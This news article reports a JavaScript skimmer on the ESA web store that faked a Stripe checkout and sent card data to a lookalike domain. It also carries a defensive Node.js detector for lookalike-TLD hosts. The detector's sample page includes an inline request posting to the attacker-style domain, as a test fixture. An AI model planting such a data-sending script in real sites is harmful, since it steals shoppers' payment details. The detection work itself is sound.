Threat actors compromised the European Space Agency's official web store by injecting JavaScript that generated a fake Stripe payment page at checkout.
The target is high-profile: ESA has a budget of more than ten billion euros and develops rockets and satellites to study the cosmos, alongside educational outreach programmes.
As of this writing, the agency's official web store is offline, displaying the message “temporarily out of orbit.”
The ESA web store compromise exposed customers' payment card data.
According to reports, the attackers used a malicious script to harvest customer data, including payment card details entered at the final step of a purchase.
Researchers reported discovering the malicious script earlier this week and warned that the store appears to be integrated with ESA systems, which could put the agency's employees at risk as well.
The investigation also found that the exfiltration domain uses the same name as the real store selling ESA merchandise, but under a different top-level domain.
The lookalike is easy to miss: the attackers used esaspaceshop[.]pics, while the agency's official shop is esaspaceshop in the .com TLD. The injected script also used obfuscated HTML taken from the Stripe SDK to render a bogus Stripe payment page when customers attempted to complete a transaction.
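The lookalike-TLD pattern described above is detectable without knowing the skimmer in advance: any script, form or request target whose registrable name matches the shop's own name but sits under a different TLD deserves a look. The following Node.js snippet is an added example, not code from the article or from any of the researchers it cites; the HTML fragment, the `/api/collect` path and the `cdn.` subdomain are constructed for illustration, and the `.com` / `.pics` pair is taken from the article.

```javascript
// Added example (not from the article): flag script, form and request targets
// whose hostname reuses the shop's own name under a different TLD.
// The sample HTML, the /api/collect path and cdn.esaspaceshop.com are constructed.

// Pull absolute and protocol-relative URLs from src/href/action attributes
// and from quoted string literals inside inline scripts (fetch/XHR targets).
function extractUrls(html) {
  const urls = new Set();
  const attrRe = /\b(?:src|href|action)\s*=\s*["']([^"']+)["']/gi;
  const literalRe = /["'`](https?:\/\/[^"'`\s]+|\/\/[^"'`\s]+)["'`]/g;
  for (const re of [attrRe, literalRe]) {
    let m;
    while ((m = re.exec(html)) !== null) urls.add(m[1]);
  }
  return [...urls];
}

// Registrable-name approximation: the label left of the final TLD label.
// Caveat: multi-label public suffixes (co.uk, com.au) need a public-suffix
// list; this heuristic would treat "shop.co.uk" as name "co", tld "uk".
function splitHost(hostname) {
  const labels = hostname.toLowerCase().split('.').filter(Boolean);
  if (labels.length < 2) return null;
  return { name: labels[labels.length - 2], tld: labels[labels.length - 1] };
}

// Returns Map<hostname, [urls]> of targets that share the site's registrable
// name but use a different TLD. Relative URLs resolve to the site itself and
// are therefore never flagged.
function findLookalikeHosts(html, siteHost) {
  const site = splitHost(siteHost);
  const hits = new Map();
  for (const raw of extractUrls(html)) {
    let url;
    try {
      url = new URL(raw, `https://${siteHost}/`);
    } catch {
      continue; // not a parseable URL (data: fragments, broken markup), skip
    }
    const parts = splitHost(url.hostname);
    if (!parts) continue;
    if (parts.name === site.name && parts.tld !== site.tld) {
      if (!hits.has(url.hostname)) hits.set(url.hostname, []);
      hits.get(url.hostname).push(url.href);
    }
  }
  return hits;
}

// Constructed checkout page: legitimate Stripe loader and same-site CDN, plus
// an inline snippet posting card data to the lookalike host.
const SAMPLE_HTML = `
<html><body>
<form action="https://esaspaceshop.com/checkout"></form>
<script src="https://js.stripe.com/v3/"></script>
<script>
  var x = new XMLHttpRequest();
  x.open('POST', 'https://esaspaceshop.pics/api/collect');
</script>
<img src="//cdn.esaspaceshop.com/logo.png">
</body></html>`;

for (const [host, urls] of findLookalikeHosts(SAMPLE_HTML, 'esaspaceshop.com')) {
  console.log(`lookalike host ${host}:`, urls);
}
```

Run against a saved copy of the checkout page (`curl -s https://shop.example/checkout`) rather than the live DOM only: skimmers of this kind often inject at runtime, so diffing the rendered DOM against the served HTML, and enforcing a Content-Security-Policy whose `connect-src` and `form-action` list only the payment processor and the shop's own origin, closes the gap this heuristic alone leaves.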
It is also worth noting that the fake Stripe page did not look suspicious, because it was served from the legitimate ESA web store itself. A separate researcher reported that the shop no longer displayed the fake Stripe payment page, although the script remained present in the site's source code.
ESA, for its part, stated that the store is not hosted on its infrastructure and that the agency does not manage the data, since it does not control it. Still, potentially affected customers should review their recent transactions and report any unrecognised charges immediately.